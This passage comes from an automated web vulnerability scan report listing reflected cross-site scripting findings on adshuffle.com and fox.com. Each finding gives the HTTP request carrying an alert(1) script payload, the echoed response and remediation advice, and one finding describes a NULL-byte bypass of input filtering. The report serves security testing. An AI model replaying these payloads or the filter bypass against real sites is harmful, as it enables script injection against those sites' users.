Cookie: v=576462396968603941; ts=9/14/2011+2:35:34+PM; z=4; sid=c849a43a-cfde-4f85-b6a4-c76881b88033; pxl=136:4B78BE|139:4B78BE|12E:4B78BE|270:4B78BE|12F:4B78BE|406:4B78BE|133:4B78BE|137:4B78BE|271:4B78BE|138:4B78BE|130:4B78BE|26F:4B78BE|C40:4B78BE|407:4B78BE|2A2:4B78BE|C36:4B78BE|135:4B78BE|131:4B78BE|134:4B78BE|132:4B78BE; px=136:00914110935|139:00914110935|12E:00914110935|270:00914110935|12F:00914110935|406:00914110935|133:00914110935|137:00914110935|271:00914110935|138:00914110935|130:00914110935|26F:00914110935|C40:00914110935|407:00914110935|2A2:00914110935|C36:00914110935|135:00914110935|131:00914110935|134:00914110935|132:00914110935; av1=32a4b.7bc32=0914110935; vcs0=v32A4B:7BC32_0_0_0_25BC5F_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 02 Oct 2011 22:52:00 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=32a4b.7bc32=0914110935:51f37.7e2e3=1002111751; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=v32A4B:7BC32_0_0_0_25BC5F_0_0|v51F37:7E2E3_0_0_0_26238F_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 02 Oct 2011 22:51:59 GMT
Content-Length: 6819
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153045525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 22:57:00 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
W9EebfNLdBJJY2S3UFiFqMELWn89HdjAlbIAYanaeCju6k6OGfXT2wlqMgPZ1YCiJ71d3c8Bo-EjdoQvB2vN3fQ7botY2RdRAMRH_LsXEfYBwbIMXev_XoYvK8QIExlD7IBFkDb1KOOH7vx2Ew10LTplTyQrWKNotE2osX96LT0LDozkZ9tT7oqshKyDK9UM1Qzhref=&fc979"><script>alert(1)</script>139d12629a4=1http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/1299329115/v/576462397214034506/ac/335671/b/279832/c/518462/clickTag/clickTag1/click.html" target="_blank">
...[SNIP]...

2.160. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html [1317596233240&ASTPCT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html

Issue detail

The value of the 1317596233240&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e3f"><script>alert(1)</script>308ad7d428d was submitted in the 1317596233240&ASTPCT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html?1317596233240&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=ADAOfa1xkkLw8PjLqkW1BuA_MZeWAr5p_Z1xLPhBBvfLu04la-ciMFsfbQjCoF1b_HYyQxIsd1h2Y3C4b2M3HVAheAPd-NWRdPIUX4z5dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=e1e3f"><script>alert(1)</script>308ad7d428d HTTP/1.1
Host: this.content.served.by.adshuffle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=337696563
Cookie: v0800017eecc6c397=1; NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 02 Oct 2011 23:04:34 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=51f37.7e2e3=1002111804; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=v51F37:7E2E3_0_0_0_26239C_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 02 Oct 2011 23:04:34 GMT
Content-Length: 1844
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 23:09:34 GMT;path=/

<html><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://media2.adshuffle.com/asrefinc11.js"></script><script type="text/javascript"
...[SNIP]...
dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=e1e3f"><script>alert(1)</script>308ad7d428dhttp://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/404898378/v/576462396953379735/ac/335671/b/279832/c/518422/click.html">
...[SNIP]...

2.161. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html [1317596233240&ASTPCT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html

Issue detail

The value of the 1317596233240&ASTPCT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002f193</script><a>1e90cad1154 was submitted in the 1317596233240&ASTPCT parameter. This input was echoed as 2f193</script><a>1e90cad1154 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html?1317596233240&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=ADAOfa1xkkLw8PjLqkW1BuA_MZeWAr5p_Z1xLPhBBvfLu04la-ciMFsfbQjCoF1b_HYyQxIsd1h2Y3C4b2M3HVAheAPd-NWRdPIUX4z5dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=%002f193</script><a>1e90cad1154 HTTP/1.1
Host: this.content.served.by.adshuffle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=337696563
Cookie: v0800017eecc6c397=1; NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 02 Oct 2011 23:04:35 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=51f37.7e2e3=1002111804; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=v51F37:7E2E3_0_0_0_26239C_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 02 Oct 2011 23:04:35 GMT
Content-Length: 1816
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 23:09:35 GMT;path=/

<html><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://media2.adshuffle.com/asrefinc11.js"></script><script type="text/javascript"
...[SNIP]...
DRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=.2f193</script><a>1e90cad1154http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8'+window._asPURL+'/287621937/v/576462396953379735/ac/335671/b/279832/c/518421/click.html">
...[SNIP]...

2.162. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8334"><script>alert(1)</script>a7e1e6eb735 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html?1317596233240&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=ADAOfa1xkkLw8PjLqkW1BuA_MZeWAr5p_Z1xLPhBBvfLu04la-ciMFsfbQjCoF1b_HYyQxIsd1h2Y3C4b2M3HVAheAPd-NWRdPIUX4z5dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=&b8334"><script>alert(1)</script>a7e1e6eb735=1 HTTP/1.1
Host: this.content.served.by.adshuffle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=337696563
Cookie: v0800017eecc6c397=1; NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 02 Oct 2011 23:04:40 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=51f37.7e2e3=1002111804; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=v51F37:7E2E3_0_0_0_26239C_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 02 Oct 2011 23:04:39 GMT
Content-Length: 1850
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 23:09:40 GMT;path=/

<html><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://media2.adshuffle.com/asrefinc11.js"></script><script type="text/javascript"
...[SNIP]...
DRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=&b8334"><script>alert(1)</script>a7e1e6eb735=1http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/460213709/v/576462396953379735/ac/335671/b/279832/c/518422/click.html">
...[SNIP]...

2.163. http://www.fox.com/_ajax/tooltip.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ajax/tooltip.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb176"-alert(1)-"1649d04200f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ajaxfb176"-alert(1)-"1649d04200f/tooltip.php?type=series&stub=americandad HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B; volumeCookie=75

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 22140
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:01:23 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ajaxfb176"-alert(1)-"1649d04200f:tooltip"
s_analytics.hier1="fox:shows:_ajaxfb176"-alert(1)-"1649d04200f:tooltip" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ajaxfb176"-alert(1)-"1649d04200f:tooltip"
s_a
...[SNIP]...

2.164. http://www.fox.com/_app/components/auth-1.0/mvpds.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_app/components/auth-1.0/mvpds.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4187b"-alert(1)-"0b4b129bfb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_app4187b"-alert(1)-"0b4b129bfb0/components/auth-1.0/mvpds.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 22184
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_app4187b"-alert(1)-"0b4b129bfb0:componentsmvpds"
s_analytics.hier1="fox:shows:_app4187b"-alert(1)-"0b4b129bfb0:componentsmvpds" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_app4187b"-alert(1)-"0b4b129bfb0
...[SNIP]...

2.165. http://www.fox.com/_app/components/auth-1.0/mvpds.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_app/components/auth-1.0/mvpds.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4c8c"-alert(1)-"ce2f205a2cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_app/componentsa4c8c"-alert(1)-"ce2f205a2cd/auth-1.0/mvpds.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.103
Content-Type: text/html; charset=utf-8
Content-Length: 22156
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:18 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_app:componentsa4c8c"-alert(1)-"ce2f205a2cdmvpds"
s_analytics.hier1="fox:shows:_app:componentsa4c8c"-alert(1)-"ce2f205a2cdmvpds" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_app:componentsa4c8c"-alert(1)-"ce2f205a2cd
...[SNIP]...

2.166. http://www.fox.com/_app/components/auth-1.0/mvpds.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_app/components/auth-1.0/mvpds.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e264"-alert(1)-"654a85d0bcf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_app/components/9e264"-alert(1)-"654a85d0bcf/mvpds.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.109
Content-Type: text/html; charset=utf-8
Content-Length: 22036
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_app" //Site Sub - Section
s_analytics.prop8="fox:shows:_app:component" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_app:components9e264"-alert(1)-"654a85d0bcf"
s_analytics.prop15="sub section:mvpds" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQuer
...[SNIP]...

2.167. http://www.fox.com/_app/components/auth-1.0/mvpds.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_app/components/auth-1.0/mvpds.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b64c8"-alert(1)-"44a53faa0a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_app/components/auth-1.0/b64c8"-alert(1)-"44a53faa0a1 HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22108
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_app:componentsb64c8"-alert(1)-"44a53faa0a1"
s_analytics.hier1="fox:shows:_app:componentsb64c8"-alert(1)-"44a53faa0a1" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_app:componentsb64c8"-alert(1)-"44a53faa0a1"
s_analy
...[SNIP]...

2.168. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-02.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-02.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5520"-alert(1)-"c507a22771b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugcb5520"-alert(1)-"c507a22771b/xml/homepage_ep_2011-10-02.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
